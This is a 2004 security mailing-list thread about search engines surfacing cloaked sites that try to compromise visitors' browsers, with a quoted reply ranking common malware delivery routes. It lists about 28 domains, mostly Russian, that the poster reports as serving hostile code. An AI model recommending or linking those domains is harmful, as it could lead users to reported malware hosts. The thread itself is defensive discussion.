[Intrusions] Google security concern?

[Empty Floatbag]

All,

Thanks for the responses.  I entirely understand that
this is an illegitimate use of a legitmate service
provided by Google.  For note, I am seeing a similar
issue on AltaVista and Yahoo - and Google did seem to
remove/blacklist a handful of the sites I sent them
last Thursday.  Essentially, what I think is that
these sites are performing some sort of "cloaking" or
other stealth behavior to mask the true content of
their site - which is a malicious payload (I am using
RealSecure IDS, NetIntercept and other tools to
determine the returning streams from these servers).

The search-bots are not picking up on the fact that
these servers have no "real" content.  I am guessing
that they are using some sort of scripting to generate
thousands of fake pages with fake content on dozens of
hostile servers.  What content I have seen is very
similar to the SPAM language, where it is randomly
coherent, yet still gibberish - as well as what looks
to be common search phrases/terms, with mis-spellings
included (the worst ones).

My prediction: the first person who can design a
better search-bot that can distinguish fake/malicious
content from real content will make millions (if that
can even be done)...

Just a sampling of the sites that are returning
hostile code...
oeteg.com
wowsukhumvit.com
www.itnews21.ru
tekona.ru
travelfund.ru
phinest.ru
iyeinteractive.com
notebook-smolensk.ru
elitmail.ru
freedommusic.ru
ballballoon.ru
styletour.ru
clubtornado.ru
anapasurfing.ru
nomacon-trade.ru
kronex.ru
www.moscowberlin.ru
www.kbe-personal.ru
www.a-1trailer.com
www.pvr-rpg.ru
sad-ajg.ru
www.lariadna.ru
www.rufiko.ru
www.altezo.ru
www.panaceamed.ru
www.solarmusic.ru
www.bummy.ru
travel.in.asia.1se.ru

Regards,
PM

--- James C Slora Jr <Jim.Slora at phra.com> wrote:

> Empty Floatbag wrote Monday, December 27, 2004 13:52
> 
> > Has anyone else noticed that some seemingly
> "normal"
> > searches on Google return completely unrelated
> sites which 
> > attempt to compromise a system through the
> browser?  
>  
> It's an old game, and is very common. Every search
> engine has its scoring
> criteria - advertisers learn what works for each
> engine, and they do
> whatever it takes to bring their clients' sites to
> the top. What works for
> legitimate advertisers works for the adware and
> malware people, too.
> 
> I always caution people to do a reality check on any
> search engine hits,
> rather than trusting the links. Search results are
> barely safer than links
> in unsolicited email.
> 
> Search engines can't recognize every piece of
> potentially hostile code on
> pages they index, even if this were part of their
> mission. Plus once a page
> is indexed, search engines cannot prevent the site's
> contents from changing
> to hostile code. Google and other search engines do
> try to keep the junk out
> of their results, but they have a never-ending
> challenge in doing this.
> Every search method has its strengths and
> weaknesses, so similar problems
> will always be with us to some extent.
> 
> You asked about caching. I believe that any page can
> control whether or not
> it is cached in Google - a lot of pages seem to
> prevent caching in order to
> make sure users get fresh content. Again, what works
> for legitimate purposes
> can also be abused.
> 
> The problem you reported is one of my most common
> incident generators. Users
> do a search and click on whatever they find,
> thinking it must be safe and
> relevant. They are conditioned against popups and
> spam, but too often have
> blind trust in search results.
> 
> Top enemies for us:
> 1. Hostile ads on legitimate ad servers
> 2. Legitimate sites with additional hostile intent
> (adware on sites that
> draw users)
> 3. Gamed search engine hits
> 4. Legitimate sites that have been hacked
> 5. Email with hostile links
> 
> These few things cover pretty much all the
> non-viral, non-network malware we
> encounter. We see a lot of overlap between these
> categories. The most common
> payload is a download trojan that usually installs
> adware. Sometimes there
> are attempts to install botnets and other kinds of
> trojans. These vehicles
> have a much higher infection success rate against us
> than worms, skiddies,
> and botnet attacks - because they spread through end
> user content that we
> allow into our network by design. We do many things
> to mitigate these
> threats, but none is 100% effective.
> 
> Search engine hits are an obvious enabler for most
> of the other types of
> threats on our list. I venture to guess that click
> rates on gamed search
> results are thousands of times better than click
> rates on spam.
> 
> This stuff is pretty mainstream - presumably because
> it generates revenue.
> Over the past year, I've found several adware
> packages promoting what would
> normally be considered legitimate businesses. It's
> hard to know whether
> these businesses knew that they were buying into the
> hostile software
> market, or if they thought they were just buying
> legitimate advertising.
> 
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
> 



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - Easier than ever with enhanced search. Learn more.
http://info.mail.yahoo.com/mail_250